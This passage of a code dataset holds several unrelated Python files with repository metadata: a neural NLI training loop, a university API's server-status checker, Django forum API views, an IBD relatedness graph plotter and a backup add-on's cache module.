'input_size': 300,\n 'hidden_size': 2048,\n 'layer1_hidden_size': 1024,\n 'n_layers': 1,\n 'bidirectional': True,\n 'embedding_size': 300,\n 'fix_emb': True,\n 'dp_ratio': 0.3,\n 'd_out': 3, # 3 classes\n 'mlp_classif_hidden_size_list': [512, 512],\n 'cuda': torch.cuda.is_available(),\n})\nstate = {k: v for k, v in args.items()}\n\n\nif __name__ == \"__main__\":\n print(args)\n\n dm = wrangle.DataManager(args)\n args.n_embed = dm.vocab.n_words\n if args.type == 'siamese':\n model = siamese_pytorch.SiameseClassifier(config=args)\n elif args.type == 's2s':\n model = Seq2Seq(config=args)\n else:\n raise Exception('model type not supported')\n\n model.embed.weight.data = load_embeddings.load_embeddings(\n dm.vocab, constants.EMBED_DATA_PATH, args.embedding_size)\n\n # Numbers of parameters\n print(\"number of trainable parameters found {}\".format(sum(\n param.nelement() for param in model.parameters()\n if param.requires_grad)))\n\n best_dev_acc = 0\n best_train_acc = -np.infty\n\n # load trained model from checkpoint\n if len(sys.argv) > 1:\n checkpoint_dir = sys.argv[1]\n print('loading from checkpoint in {}'.format(checkpoint_dir))\n model_pipeline_pytorch.load_checkpoint(model, checkpoint=checkpoint_dir)\n state['lr'] = 0.01\n print('resetting lr as {}'.format(state['lr']))\n\n criterion = nn.NLLLoss()\n\n for epoch in range(args.epochs):\n dm.shuffle_train_data()\n\n print('lr {}'.format(state['lr']))\n optimizer = optim.SGD(\n [param for param in model.parameters() if param.requires_grad],\n lr=state['lr'])\n logger.info('\\nEpoch: [{} | {}] LR: {}'.format(\n epoch + 1, args.epochs, state['lr']))\n\n if args.cuda:\n model.cuda()\n train_loss, train_acc = model_pipeline_pytorch.train(\n model=model,\n optimizer=optimizer,\n epoch=epoch,\n di=dm,\n args=args,\n loss_criterion=criterion,\n )\n dev_loss, dev_acc = model_pipeline_pytorch.test(\n model=model,\n epoch=epoch,\n di=dm,\n args=args,\n loss_criterion=criterion,\n )\n if dev_acc > best_dev_acc:\n print('New best model: {} vs {}'.format(dev_acc, best_dev_acc))\n best_dev_acc = dev_acc\n model_pipeline_pytorch.save_checkpoint(\n state={\n 'epoch': epoch + 1,\n 'state_dict': model.state_dict(),\n 'acc': dev_acc,\n 'best_acc': best_dev_acc,\n 'optimizer': optimizer.state_dict()\n }, is_best=True)\n print('Saving to checkpoint')\n model_pipeline_pytorch.save_checkpoint(\n state={\n 'epoch': epoch + 1,\n 'state_dict': model.state_dict(),\n 'acc': 
dev_acc,\n 'best_acc': best_dev_acc,\n 'optimizer': optimizer.state_dict()\n }, is_best=False)\n if train_acc - best_train_acc < 3:\n state['lr'] *= args.learning_rate_decay\n if train_acc > best_train_acc:\n best_train_acc = train_acc\n", "repo_name": "kolchinski/NLI_2018", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 4050, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 19, "usage_type": "call"}, {"api_name": "utils.dotdict", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 42, "usage_type": "attribute"}, {"api_name": "dataman.wrangle.DataManager", "line_number": 50, "usage_type": "call"}, {"api_name": "dataman.wrangle", "line_number": 50, "usage_type": "name"}, {"api_name": "models.siamese_pytorch.SiameseClassifier", "line_number": 53, "usage_type": "call"}, {"api_name": "models.siamese_pytorch", "line_number": 53, "usage_type": "name"}, {"api_name": "models.seq2seq_model_pytorch.Seq2Seq", "line_number": 55, "usage_type": "call"}, {"api_name": "models.load_embeddings.load_embeddings", "line_number": 59, "usage_type": "call"}, {"api_name": "models.load_embeddings", "line_number": 59, "usage_type": "name"}, {"api_name": "constants.EMBED_DATA_PATH", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numpy.infty", "line_number": 68, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 71, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 72, "usage_type": "attribute"}, {"api_name": "models.model_pipeline_pytorch.load_checkpoint", "line_number": 74, "usage_type": "call"}, {"api_name": "models.model_pipeline_pytorch", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.nn.NLLLoss", "line_number": 78, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 78, "usage_type": "name"}, {"api_name": "torch.optim.SGD", "line_number": 84, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 84, "usage_type": "name"}, {"api_name": "models.model_pipeline_pytorch.train", "line_number": 92, "usage_type": "call"}, {"api_name": "models.model_pipeline_pytorch", "line_number": 92, "usage_type": "name"}, {"api_name": "models.model_pipeline_pytorch.test", "line_number": 100, "usage_type": "call"}, {"api_name": "models.model_pipeline_pytorch", "line_number": 100, "usage_type": "name"}, {"api_name": "models.model_pipeline_pytorch.save_checkpoint", "line_number": 110, "usage_type": "call"}, {"api_name": "models.model_pipeline_pytorch", "line_number": 110, "usage_type": "name"}, {"api_name": "models.model_pipeline_pytorch.save_checkpoint", "line_number": 119, "usage_type": "call"}, {"api_name": "models.model_pipeline_pytorch", "line_number": 119, "usage_type": "name"}]} +{"seq_id": "148222980", "text": "import datetime\nimport json\nimport subprocess\nfrom multiprocessing.pool import ThreadPool\n\nimport redis\nimport requests\n\nfrom crawler import bus_crawler, webap_crawler\nfrom utils import config, error_code\nfrom utils.config import REDIS_URL\n\nred_string = 
redis.StrictRedis.from_url(\n url=REDIS_URL, db=4, charset=\"utf-8\", decode_responses=True)\n\nWRONG_ACCOUNT = 'abcdefg'\nWRONG_PASSWORD = 'wowisatest'\n\nLEAVE_URL = 'http://leave.nkust.edu.tw/LogOn.aspx'\nLIBRARY_URL = 'http://www.lib.nkust.edu.tw/portal/portal_login.php'\n\n\ndef _request(session, url, timeout):\n try:\n if session.get(url=url, timeout=timeout).status_code == 200:\n return 100\n except requests.exceptions.ConnectTimeout as e:\n return 101\n return 101\n\n\ndef server_status():\n\n if red_string.exists('server_status'):\n return red_string.get('server_status')\n\n req_session = requests.session()\n pool = ThreadPool(processes=4)\n\n bus_test = pool.apply_async(bus_crawler.login, kwds={\n 'session': req_session,\n 'username': WRONG_ACCOUNT,\n 'password': WRONG_PASSWORD\n })\n webap_test = pool.apply_async(webap_crawler.login, kwds={\n 'session': req_session,\n 'username': config.AP_GUEST_ACCOUNT,\n 'password': config.AP_GUEST_PASSWORD\n })\n\n leave_test = pool.apply_async(_request, kwds={\n 'session': req_session,\n 'url': LEAVE_URL,\n 'timeout': 4\n })\n library_test = pool.apply_async(_request, kwds={\n 'session': req_session,\n 'url': LIBRARY_URL,\n 'timeout': 4\n })\n\n git_commit_id = subprocess.check_output(\n ['git', 'rev-parse', '--short', 'HEAD']).decode(\"utf-8\").strip(\"\\n\")\n\n data = {\n \"date\": datetime.datetime.utcnow().isoformat(timespec='seconds')+\"Z\",\n \"commit\": git_commit_id,\n \"data\": [\n {\n \"service\": \"ap\",\n \"isAlive\": webap_test.get() is error_code.WENAP_LOGIN_SUCCESS,\n \"description\": \"校務系統\"\n },\n {\n \"service\": \"bus\",\n \"isAlive\": bus_test.get() is error_code.BUS_USER_WRONG_CAMPUS_OR_NOT_FOUND_USER,\n \"description\": \"校車系統\"\n },\n {\n \"service\": \"leave\",\n \"isAlive\": leave_test.get() is 100,\n \"description\": \"缺曠系統\"\n },\n {\n \"service\": \"library\",\n \"isAlive\": library_test.get()is 100,\n \"description\": \"圖書館系統\"\n }\n ]\n }\n _dumps = json.dumps(data, ensure_ascii=False)\n red_string.set(name='server_status', value=_dumps,\n ex=config.CACHE_SERVER_STATUS_EXPITE_TIME)\n\n return _dumps\n", "repo_name": "macs1207/NKUST-AP-API", "sub_path": "src/cache/api_cache.py", "file_name": "api_cache.py", "file_ext": "py", "file_size_in_byte": 2767, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "redis.StrictRedis.from_url", "line_number": 13, "usage_type": "call"}, {"api_name": "redis.StrictRedis", "line_number": 13, "usage_type": "attribute"}, {"api_name": "utils.config.REDIS_URL", "line_number": 14, "usage_type": "name"}, {"api_name": "requests.exceptions", "line_number": 27, "usage_type": "attribute"}, {"api_name": "requests.session", "line_number": 37, "usage_type": "call"}, {"api_name": "multiprocessing.pool.ThreadPool", "line_number": 38, "usage_type": "call"}, {"api_name": "crawler.bus_crawler.login", "line_number": 40, "usage_type": "attribute"}, {"api_name": "crawler.bus_crawler", "line_number": 40, "usage_type": "name"}, {"api_name": "crawler.webap_crawler.login", "line_number": 45, "usage_type": "attribute"}, {"api_name": "crawler.webap_crawler", "line_number": 45, "usage_type": "name"}, {"api_name": "utils.config.AP_GUEST_ACCOUNT", "line_number": 47, "usage_type": "attribute"}, {"api_name": "utils.config", "line_number": 47, "usage_type": "name"}, {"api_name": "utils.config.AP_GUEST_PASSWORD", "line_number": 48, "usage_type": "attribute"}, {"api_name": "utils.config", "line_number": 48, "usage_type": "name"}, {"api_name": 
"subprocess.check_output", "line_number": 62, "usage_type": "call"}, {"api_name": "datetime.datetime.utcnow", "line_number": 66, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 66, "usage_type": "attribute"}, {"api_name": "utils.error_code.WENAP_LOGIN_SUCCESS", "line_number": 71, "usage_type": "attribute"}, {"api_name": "utils.error_code", "line_number": 71, "usage_type": "name"}, {"api_name": "utils.error_code.BUS_USER_WRONG_CAMPUS_OR_NOT_FOUND_USER", "line_number": 76, "usage_type": "attribute"}, {"api_name": "utils.error_code", "line_number": 76, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 91, "usage_type": "call"}, {"api_name": "utils.config.CACHE_SERVER_STATUS_EXPITE_TIME", "line_number": 93, "usage_type": "attribute"}, {"api_name": "utils.config", "line_number": 93, "usage_type": "name"}]} +{"seq_id": "32976205567", "text": "import math\n\nfrom django.db.models import Count\nfrom django.utils import timezone\nfrom rest_framework import generics, permissions\n\nfrom api import models, serializers\n\n\nclass TopicList(generics.ListCreateAPIView):\n queryset = models.Topic.objects.all()\n\n def get_throttles(self):\n if self.request.method == \"POST\":\n self.throttle_scope = \"slow\"\n return super().get_throttles()\n\n def get_serializer_class(self):\n if self.request.method == \"POST\":\n return serializers.FirstPostSerializer\n return serializers.TopicSerializer\n\n def perform_create(self, serializer):\n serializer.save(author=self.request.user.username)\n\n def list(self, request):\n response = super().list(request)\n self._append_seen_count_to_response(request, response)\n response.data[\"page_size\"] = self.paginator.page_size\n return response\n\n def _append_seen_count_to_response(self, request, response):\n ids = {topic[\"id\"] for topic in response.data[\"results\"]}\n records = dict(request.user.record_set.filter(topic__in=ids).values_list(\"topic\", \"count\"))\n for topic in response.data[\"results\"]:\n topic[\"seen_count\"] = records.get(topic[\"id\"], 0)\n topic[\"page_size\"] = self.paginator.page_size\n\n\nclass TopicDetail(generics.RetrieveDestroyAPIView):\n queryset = models.Topic.objects.all()\n serializer_class = serializers.TopicSerializer\n permission_classes = [permissions.IsAdminUser]\n\n\nclass PostList(generics.ListCreateAPIView):\n\n def get_throttles(self):\n if self.request.method == \"POST\":\n self.throttle_scope = \"slow\"\n return super().get_throttles()\n\n def get_serializer_class(self):\n if self.request.method == \"POST\":\n return serializers.ReplySerializer\n return serializers.PostListSerializer\n\n def get_queryset(self):\n topic_id = int(self.kwargs[\"topic_id\"])\n return (models.Post.objects\n .filter(topic=topic_id)\n .select_related(\"topic\")\n .order_by(\"timestamp\")\n )\n\n def perform_create(self, serializer):\n serializer.save(author=self.request.user.username, timestamp=timezone.now(), topic_id=self.kwargs[\"topic_id\"])\n\n def list(self, request, topic_id):\n response = super().list(request, topic_id)\n self._maybe_update_record(request, topic_id, response)\n self._add_topic_to_response(topic_id, response)\n self._enumerate_results(request, response)\n response.data[\"page_size\"] = self.paginator.page_size\n return response\n\n def _maybe_update_record(self, request, topic_id, response):\n page = request.query_params.get(\"page\", \"1\")\n count = min(self.paginator.page_size * int(page), response.data[\"count\"])\n record = request.user.record_set.filter(topic_id=topic_id).first()\n 
if not record or count > record.count:\n request.user.record_set.update_or_create(topic_id=topic_id, defaults={\"count\": count})\n\n def _add_topic_to_response(self, topic_id, response):\n topic = models.Topic.objects.get(id=topic_id)\n response.data[\"topic\"] = serializers.TopicSerializer(topic).data\n\n def _enumerate_results(self, request, response):\n for i, post in enumerate(response.data[\"results\"], 1):\n post[\"index\"] = (int(request.query_params.get(\"page\", \"1\"))-1) * self.paginator.page_size + i\n\n\nclass PostDetail(generics.RetrieveUpdateDestroyAPIView):\n serializer_class = serializers.PostDetailSerializer\n\n def get_queryset(self):\n return models.Post.objects.filter(topic_id=self.kwargs[\"topic_id\"])\n\n def get(self, request, topic_id, pk):\n response = super().get(request, topic_id, pk)\n obj = self.get_object()\n qs = self.get_queryset()\n index = list(qs).index(obj) + 1\n page = math.ceil(index/self.paginator.page_size)\n response.data[\"context\"] = {\"index\": index, \"page\": page}\n return response\n\n\nclass UserList(generics.ListAPIView):\n queryset = models.User.objects.order_by(\"id\")\n serializer_class = serializers.UserSerializer\n\n def list(self, request):\n response = super().list(request)\n for user in response.data[\"results\"]:\n qs = models.Post.objects.filter(author=user[\"username\"])\n user[\"post_count\"] = len(qs)\n return response\n", "repo_name": "RodericDay/forum", "sub_path": "api/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 4402, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rest_framework.generics.ListCreateAPIView", "line_number": 10, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 10, "usage_type": "name"}, {"api_name": "api.models.Topic.objects.all", "line_number": 11, "usage_type": "call"}, {"api_name": "api.models.Topic", "line_number": 11, "usage_type": "attribute"}, {"api_name": "api.models", "line_number": 11, "usage_type": "name"}, {"api_name": "api.serializers.FirstPostSerializer", "line_number": 20, "usage_type": "attribute"}, {"api_name": "api.serializers", "line_number": 20, "usage_type": "name"}, {"api_name": "api.serializers.TopicSerializer", "line_number": 21, "usage_type": "attribute"}, {"api_name": "api.serializers", "line_number": 21, "usage_type": "name"}, {"api_name": "rest_framework.generics.RetrieveDestroyAPIView", "line_number": 40, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 40, "usage_type": "name"}, {"api_name": "api.models.Topic.objects.all", "line_number": 41, "usage_type": "call"}, {"api_name": "api.models.Topic", "line_number": 41, "usage_type": "attribute"}, {"api_name": "api.models", "line_number": 41, "usage_type": "name"}, {"api_name": "api.serializers.TopicSerializer", "line_number": 42, "usage_type": "attribute"}, {"api_name": "api.serializers", "line_number": 42, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAdminUser", "line_number": 43, "usage_type": "attribute"}, {"api_name": "rest_framework.permissions", "line_number": 43, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListCreateAPIView", "line_number": 46, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 46, "usage_type": "name"}, {"api_name": "api.serializers.ReplySerializer", "line_number": 55, "usage_type": "attribute"}, {"api_name": "api.serializers", "line_number": 55, "usage_type": 
"name"}, {"api_name": "api.serializers.PostListSerializer", "line_number": 56, "usage_type": "attribute"}, {"api_name": "api.serializers", "line_number": 56, "usage_type": "name"}, {"api_name": "api.models.Post.objects.filter", "line_number": 60, "usage_type": "call"}, {"api_name": "api.models.Post", "line_number": 60, "usage_type": "attribute"}, {"api_name": "api.models", "line_number": 60, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 67, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 67, "usage_type": "name"}, {"api_name": "api.models.Topic.objects.get", "line_number": 85, "usage_type": "call"}, {"api_name": "api.models.Topic", "line_number": 85, "usage_type": "attribute"}, {"api_name": "api.models", "line_number": 85, "usage_type": "name"}, {"api_name": "api.serializers.TopicSerializer", "line_number": 86, "usage_type": "call"}, {"api_name": "api.serializers", "line_number": 86, "usage_type": "name"}, {"api_name": "rest_framework.generics.RetrieveUpdateDestroyAPIView", "line_number": 93, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 93, "usage_type": "name"}, {"api_name": "api.serializers.PostDetailSerializer", "line_number": 94, "usage_type": "attribute"}, {"api_name": "api.serializers", "line_number": 94, "usage_type": "name"}, {"api_name": "api.models.Post.objects.filter", "line_number": 97, "usage_type": "call"}, {"api_name": "api.models.Post", "line_number": 97, "usage_type": "attribute"}, {"api_name": "api.models", "line_number": 97, "usage_type": "name"}, {"api_name": "math.ceil", "line_number": 104, "usage_type": "call"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 109, "usage_type": "attribute"}, {"api_name": "rest_framework.generics", "line_number": 109, "usage_type": "name"}, {"api_name": "api.models.User.objects.order_by", "line_number": 110, "usage_type": "call"}, {"api_name": "api.models.User", "line_number": 110, "usage_type": "attribute"}, {"api_name": "api.models", "line_number": 110, "usage_type": "name"}, {"api_name": "api.serializers.UserSerializer", "line_number": 111, "usage_type": "attribute"}, {"api_name": "api.serializers", "line_number": 111, "usage_type": "name"}, {"api_name": "api.models.Post.objects.filter", "line_number": 116, "usage_type": "call"}, {"api_name": "api.models.Post", "line_number": 116, "usage_type": "attribute"}, {"api_name": "api.models", "line_number": 116, "usage_type": "name"}]} +{"seq_id": "25641054385", "text": "import sys, os\nimport numpy as np\nimport pandas as pd\nimport scipy.sparse\nimport networkx as nx\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nimport argparse\n\n\nclass IBDtoGraph:\n def __init__(self, ibd_file=None, ibd_array=None):\n assert not (ibd_file and ibd_array)\n assert (ibd_file or ibd_array)\n \n self.pairwise_total_ibd_array = None\n self.ninds = None\n self.pos = None\n self.graph_params = None\n \n self.ibd_array = ibd_array\n if ibd_file is not None:\n self.ibd_array = np.load(ibd_file)['ibd_array']\n \n self.ibd_df = pd.DataFrame(self.ibd_array, columns=['ind1', 'ind2', 'start', 'end'])\n self.ibd_df['len'] = self.ibd_df['end'] - self.ibd_df['start']\n \n # Could check inds are all ints first\n self.inds = list(set(self.ibd_df[['ind1', 'ind2']].values.astype(int).ravel()))\n self.ninds = max(self.inds)\n \n def set_pairwise_total_IBD(self, maxrows=None, input_file=None, output_file=None):\n self.pairwise_total_ibd_array = 
scipy.sparse.lil_matrix((self.ninds + 1, self.ninds + 1))\n\n if input_file:\n assert output_file is not None\n self.pairwise_total_ibd_array = scipy.sparse.load_npz(input_file).tolil()\n return\n \n for i, row in tqdm(self.ibd_df.iterrows(), total=self.ibd_df.shape[0]):\n ind1, ind2 = sorted([int(row.ind1), int(row.ind2)])\n self.pairwise_total_ibd_array[ind1, ind2] += row.len\n if maxrows is not None and i > maxrows:\n break\n\n if output_file:\n scipy.sparse.save_npz(output_file, self.pairwise_total_ibd_array.tocoo())\n \n def build_graph(self, k=None, iterations=None, outfile=None):\n G = nx.Graph()\n coo = self.pairwise_total_ibd_array.tocoo()\n max_len = coo.data.max()\n for r, c, d in zip(coo.row, coo.col, coo.data):\n G.add_edge(r, c, weight=d / max_len)\n \n if outfile is not None:\n nx.nx_pydot.write_dot(G, os.path.expanduser(outfile))\n \n self.graph_params = {'k': k, 'iterations': iterations}\n pos = nx.spring_layout(G, k=k, iterations=iterations)\n self.pos = np.vstack(list(pos.values()))\n \n def plot_graph(self, outfile=None, **plot_args):\n if self.pos is None:\n raise ValueError(\"Must run 'build_graph' before plotting!\")\n \n p_args = {'s': 1, 'alpha': 0.5}\n for k, v in plot_args.items():\n p_args[k] = v\n \n plt.scatter(self.pos[:, 0], self.pos[:, 1], **p_args)\n plt.title(str(self.graph_params['iterations']) + ' iterations')\n \n if outfile:\n plt.savefig(os.path.expanduser(outfile))\n \n try:\n plt.show()\n except:\n pass\n \n\ndef main(args):\n ibd_file = os.path.expanduser(args.ibd_file)\n plot_file = os.path.expanduser(args.plot_file)\n\n pairwise_total_ibd_input = None\n if args.pairwise_total_ibd_input:\n pairwise_total_ibd_input = os.path.expanduser(args.pairwise_total_ibd_input)\n\n pairwise_total_ibd_output = None\n if args.pairwise_total_ibd_output:\n pairwise_total_ibd_output = os.path.expanduser(args.pairwise_total_ibd_output)\n\n I = IBDtoGraph(ibd_file=ibd_file)\n I.set_pairwise_total_IBD(maxrows=args.max_rows, input_file=pairwise_total_ibd_input,\n output_file=pairwise_total_ibd_output)\n I.build_graph(iterations=args.iterations, k=args.point_spread)\n I.plot_graph(alpha=args.plot_alpha, outfile=plot_file)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-i\", \"--ibd_file\", required=True)\n parser.add_argument(\"-o\", \"--plot_file\", required=True)\n parser.add_argument(\"-p\", \"--pairwise_total_ibd_input\")\n parser.add_argument(\"-s\", \"--pairwise_total_ibd_output\")\n parser.add_argument(\"-a\", \"--plot_alpha\", type=float, default=0.5)\n parser.add_argument(\"-m\", \"--max_rows\", type=int)\n parser.add_argument(\"-k\", \"--point_spread\", type=float)\n parser.add_argument(\"-t\", \"--iterations\", type=int, default=50)\n\n args = parser.parse_args()\n main(args)\n", "repo_name": "DomNelson/wf_coalescent", "sub_path": "scripts/plot_graph_ibd.py", "file_name": "plot_graph_ibd.py", "file_ext": "py", "file_size_in_byte": 4304, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "matplotlib.use", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 27, "usage_type": "call"}, {"api_name": "scipy.sparse.sparse.lil_matrix", "line_number": 35, "usage_type": "call"}, {"api_name": "scipy.sparse.sparse", "line_number": 35, "usage_type": "attribute"}, {"api_name": "scipy.sparse", "line_number": 35, "usage_type": "name"}, 
{"api_name": "scipy.sparse.sparse.load_npz", "line_number": 39, "usage_type": "call"}, {"api_name": "scipy.sparse.sparse", "line_number": 39, "usage_type": "attribute"}, {"api_name": "scipy.sparse", "line_number": 39, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 42, "usage_type": "call"}, {"api_name": "scipy.sparse.sparse.save_npz", "line_number": 49, "usage_type": "call"}, {"api_name": "scipy.sparse.sparse", "line_number": 49, "usage_type": "attribute"}, {"api_name": "scipy.sparse", "line_number": 49, "usage_type": "name"}, {"api_name": "networkx.Graph", "line_number": 52, "usage_type": "call"}, {"api_name": "networkx.nx_pydot.write_dot", "line_number": 59, "usage_type": "call"}, {"api_name": "networkx.nx_pydot", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "networkx.spring_layout", "line_number": 62, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.show", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "os.path.expanduser", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 87, "usage_type": "call"}, {"api_name": "os.path", "line_number": 87, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "os.path.expanduser", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 105, "usage_type": "call"}]} +{"seq_id": "41236474648", "text": "from datetime import timedelta\nfrom enum import Enum, unique\nfrom backup.config import Config, Setting, VERSION, Version\nfrom backup.file import JsonFileSaver\nfrom backup.const import NECESSARY_OLD_BACKUP_PLURAL_NAME\nfrom injector import inject, singleton\nfrom ..time import Time\nfrom typing import Dict\nimport json\nimport os\n\nKEY_I_MADE_THIS = \"i_made_this\"\nKEY_PENDING = \"pending\"\nKEY_CREATED = \"created\"\nKEY_IGNORE = \"ignore\"\nKEY_LAST_SEEN = \"last_seen\"\nKEY_NAME = \"name\"\nKEY_LAST_VERSION = \"last_verison\"\nKEY_UPGRADES = \"upgrades\"\nKEY_FLAGS = \"flags\"\nKEY_NOTE = \"note\"\n\nCACHE_EXPIRATION_DAYS = 30\n\nVERSION_DEFUALT_IGNORE_UPGRADES = Version.parse(\"0.108.2\")\n\n\n@unique\nclass UpgradeFlags(Enum):\n NOTIFIED_ABOUT_BACKUP_RENAME = \"notified_backup_rename\"\n NOTIFIED_ABOUT_IGNORED_BACKUPS = \"notified_ignored_backups\"\n NOTIFIED_ABOUT_OOB_FLOW = \"notified_about_oob_flow\"\n TESTING_FLAG = 
\"testing_flag\"\n\n\n@singleton\nclass DataCache:\n @inject\n def __init__(self, config: Config, time: Time):\n self._config = config\n self._data = {}\n self._dirty = {}\n self._time = time\n self._last_version = Version.default()\n self._first_version = Version.default()\n self._flags = set()\n self._load()\n\n def _load(self):\n path = self._config.get(Setting.DATA_CACHE_FILE_PATH)\n if not JsonFileSaver.exists(path):\n self._data = {NECESSARY_OLD_BACKUP_PLURAL_NAME: {}}\n else:\n self._data = JsonFileSaver.read(path)\n\n # Check for an upgrade.\n if KEY_LAST_VERSION in self._data:\n self._last_version = Version.parse(self._data[KEY_LAST_VERSION])\n if self.previousVersion != self.currentVersion:\n # add an upgrade marker\n if KEY_UPGRADES not in self._data:\n self._data[KEY_UPGRADES] = []\n self._data[KEY_UPGRADES].append({\n 'prev_version': str(self.previousVersion),\n 'new_version': str(self.currentVersion),\n 'date': self._time.now().isoformat()\n })\n self._data[KEY_LAST_VERSION] = str(self.currentVersion)\n self.makeDirty()\n if KEY_UPGRADES not in self._data or len(self._data[KEY_UPGRADES]) == 0:\n self._first_version = self.currentVersion\n else:\n self._first_version = Version.parse(self._data[KEY_UPGRADES][0]['new_version'])\n\n if self._config.isExplicit(Setting.IGNORE_OTHER_BACKUPS) or self._config.isExplicit(Setting.IGNORE_UPGRADE_BACKUPS):\n self.addFlag(UpgradeFlags.NOTIFIED_ABOUT_IGNORED_BACKUPS)\n\n if self.notifyForIgnoreUpgrades:\n self._config.useLegacyIgnoredBehavior(True)\n\n self.saveIfDirty()\n\n def save(self, data=None):\n if data is None:\n data = self._data\n path = self._config.get(Setting.DATA_CACHE_FILE_PATH)\n JsonFileSaver.write(path, data)\n self._dirty = False\n\n def makeDirty(self):\n self._dirty = True\n\n @property\n def dirty(self) -> bool:\n return self._dirty\n\n @property\n def backups(self) -> Dict[str, Dict[str, str]]:\n if NECESSARY_OLD_BACKUP_PLURAL_NAME not in self._data:\n self._data[NECESSARY_OLD_BACKUP_PLURAL_NAME] = {}\n return self._data[NECESSARY_OLD_BACKUP_PLURAL_NAME]\n\n def backup(self, slug) -> Dict[str, str]:\n if slug not in self.backups:\n self.backups[slug] = {}\n return self.backups[slug]\n\n def saveIfDirty(self):\n if self._dirty:\n # See if we need to remove any old entries\n for slug in list(self.backups.keys()):\n data = self.backups[slug].get(KEY_LAST_SEEN)\n if data is not None and self._time.now() > self._time.parse(data) + timedelta(days=CACHE_EXPIRATION_DAYS):\n del self.backups[slug]\n self.save()\n\n @property\n def previousVersion(self):\n return self._last_version\n\n @property\n def firstVersion(self):\n return self._first_version\n\n @property\n def currentVersion(self):\n return Version.parse(VERSION)\n\n @property\n def notifyForIgnoreUpgrades(self):\n return self.firstVersion < VERSION_DEFUALT_IGNORE_UPGRADES and not self.checkFlag(UpgradeFlags.NOTIFIED_ABOUT_IGNORED_BACKUPS) and not self._config.isExplicit(Setting.IGNORE_OTHER_BACKUPS) and not self._config.isExplicit(Setting.IGNORE_UPGRADE_BACKUPS)\n\n def checkFlag(self, flag: UpgradeFlags):\n return flag.value in self._data.get(KEY_FLAGS, [])\n\n def TESTS_ONLY_clearFlags(self):\n self._data[KEY_FLAGS] = []\n\n def addFlag(self, flag: UpgradeFlags):\n all_flags = set(self._data.get(KEY_FLAGS, []))\n all_flags.add(flag.value)\n self._data[KEY_FLAGS] = list(all_flags)\n self.makeDirty()\n\n def getUpgradeTime(self, version: Version):\n for upgrade in self._data[KEY_UPGRADES]:\n if Version.parse(upgrade['new_version']) >= version:\n return 
